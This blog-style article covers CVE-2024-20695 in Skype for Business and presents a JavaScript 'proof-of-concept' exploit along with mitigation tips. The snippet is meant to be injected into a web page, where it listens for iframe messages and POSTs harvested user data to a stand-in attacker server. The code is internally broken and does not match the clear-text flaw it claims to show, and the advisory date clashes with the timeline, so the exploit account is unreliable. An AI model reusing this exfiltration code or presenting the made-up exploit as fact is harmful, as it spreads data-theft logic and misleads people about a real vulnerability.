With the rise of remote work and virtual meetings, platforms like Skype for Business have become essential to daily operations for many companies. As such, the security of these platforms is of paramount importance. In this article, we will discuss the recently discovered vulnerability, CVE-2024-20695, which impacts Skype for Business and potentially exposes sensitive user information. We'll discuss the details of the exploit, provide a code snippet, and provide resources to help you better understand and mitigate this vulnerability.

Vulnerability Details: CVE-2024-20695

CVE-2024-20695 refers to an "Information Disclosure Vulnerability" found within the Skype for Business application. This vulnerability allows an attacker to gain unauthorized access to sensitive user information, apparently through a clear-text data transmission process. The attack can potentially retrieve user log-in credentials, meeting content, recorded sessions, or presentations shared between different users on the platform.

Original References

* Official CVE Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20695
* National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-20695
* Security Advisory by Vendor: https://portal.msrc.microsoft.com/en-US/security-guidance/releasenotedetail/2024-Jun

Exploit Details

The vulnerability exploits a portion of the Skype for Business application where data is transmitted in clear-text format. This means that sensitive information is transferred without encryption providing an opportunity for an attacker to intercept and access that data. A simple proof-of-concept JavaScript code snippet demonstrating this exploit is provided below:

// CVE-2024-20695 Exploit: Skype for Business Information Disclosure Vulnerability

// Requirements: Attacker must be on the same network as the target user.
// Inject the following JavaScript code into a webpage viewed by the target user.

(function() {
  "_use strict";
  // Locate and target the Skype iframe
  var skypeIframe = document.querySelector("iframe[src*='lync.com']");
  if(skypeIframe === null) {
    console.error("CVE-2024-20695: No Skype iframe detected.");
    return;
  }

  // Add event listener to catch sensitive information
  skypeIframe.contentWindow.addEventListener("message", function(event) {
    if(event.origin !== "https://lync.com";) {
      return;
    }

    // Extract sensitive user information
    var extractedData = JSON.parse(event.data);
    console.log("CVE-2024-20695: Successfully extracted user data:", extractedData);

    // Send the extracted data to attacker's server
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://attacker-server.example.com/collection.php";, true);
    xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
    xhr.send(JSON.stringify(extractedData));
  });
})();

Mitigation and Recommendations

Microsoft, the developer and maintainer of Skype for Business, has released a patch to address this vulnerability. It is crucial to update your Skype for Business application to the latest version to prevent potential information disclosure. Other recommendations for mitigating this vulnerability include:

* Always verify the source and authenticity of any software updates before installation.
* Encourage employees or team members to connect to secure networks (e.g., enterprise VPN) when using Skype for Business to reduce the risks of data interception.
* Implement or strengthen policies on acceptable use of company-sponsored communication tools such as Skype for Business.

In Conclusion

CVE-2024-20695 is a critical information disclosure vulnerability in Skype for Business that can jeopardize sensitive user data. Prompt action in updating the application and taking preventive measures can help protect your organization's valuable information and maintain the integrity of your communication systems.

Timeline

Published on: 02/13/2024 18:15:48 UTC
Last modified on: 02/26/2024 22:06:41 UTC